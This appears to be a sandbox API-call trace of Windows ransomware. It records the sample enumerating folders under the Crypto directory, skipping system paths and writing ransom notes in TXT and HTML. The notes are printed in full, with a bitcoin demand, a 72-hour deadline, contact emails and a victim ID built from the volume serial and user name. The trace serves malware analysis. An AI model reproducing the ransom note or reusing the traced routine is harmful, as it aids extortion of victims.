	[0167.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="winnt") returned 0x0
	[0167.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="tmp") returned 0x0
	[0167.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="cache") returned 0x0
	[0167.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="webcache") returned 0x0
	[0167.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="inetcache") returned 0x0
	[0167.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="nvidia") returned 0x0
	[0167.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="packages") returned 0x0
	[0167.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="cookies") returned 0x0
	[0167.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="programdata") returned 0x0
	[0167.055] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.055] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.055] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x7d17c235, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.055] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.055] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 1
	[0167.056] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d155f35, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d155f35, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d1a23d9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.056] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d12fe4d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d12fe4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d155f35, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.056] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d12fe4d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d12fe4d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d155f35, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0167.056] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.056] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.056] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0
	[0167.057] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0167.057] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0167.057] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 1
	[0167.057] lstrcmpW (lpString1="SystemKeys", lpString2="..") returned 1
	[0167.057] lstrcmpW (lpString1="SystemKeys", lpString2=".") returned 1
	[0167.058] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0167.058] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0167.058] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="SystemKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys"
	[0167.058] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys"
	[0167.058] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\"
	[0167.058] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\"
	[0167.058] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*"
	[0167.058] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.059] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*") returned 50
	[0167.059] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.059] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*") returned 0x32
	[0167.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="windows") returned 0x0
	[0167.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="boot") returned 0x0
	[0167.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="system volume information") returned 0x0
	[0167.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="temp") returned 0x0
	[0167.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="program files") returned 0x0
	[0167.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="appdata") returned 0x0
	[0167.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="application data") returned 0x0
	[0167.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="winnt") returned 0x0
	[0167.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="tmp") returned 0x0
	[0167.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="cache") returned 0x0
	[0167.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="webcache") returned 0x0
	[0167.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="inetcache") returned 0x0
	[0167.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="nvidia") returned 0x0
	[0167.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="packages") returned 0x0
	[0167.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="cookies") returned 0x0
	[0167.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\*.*", lpSrch="programdata") returned 0x0
	[0167.081] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.082] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 1
	[0167.082] lstrcmpW (lpString1="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2="..") returned 1
	[0167.082] lstrcmpW (lpString1="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2=".") returned 1
	[0167.082] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\"
	[0167.082] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\", lpString2="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778"
	[0167.082] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 116
	[0167.082] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.082] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cchLength=0x74 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 0x74
	[0167.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.083] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778"
	[0167.083] lstrlenW (lpString="c:\\users\\all users\\microsoft\\crypto\\systemkeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 116
	[0167.083] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.084] StrStrW (lpFirst="2f-8c0f-c90408af5778", lpSrch=".") returned 0x0
	[0167.084] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 0
	[0167.084] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.084] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.085] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys"
	[0167.085] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*.*"
	[0167.085] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.085] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.085] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0167.085] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.090] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.090] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.095] CloseHandle (hObject=0x388) returned 1
	[0167.095] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.096] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0167.097] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.097] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.098] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.098] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.098] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0167.098] CloseHandle (hObject=0x388) returned 1
	[0167.099] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.099] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.099] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.099] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0167.100] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.100] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.100] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0167.104] CloseHandle (hObject=0x388) returned 1
	[0167.104] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.104] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.105] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0167.106] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
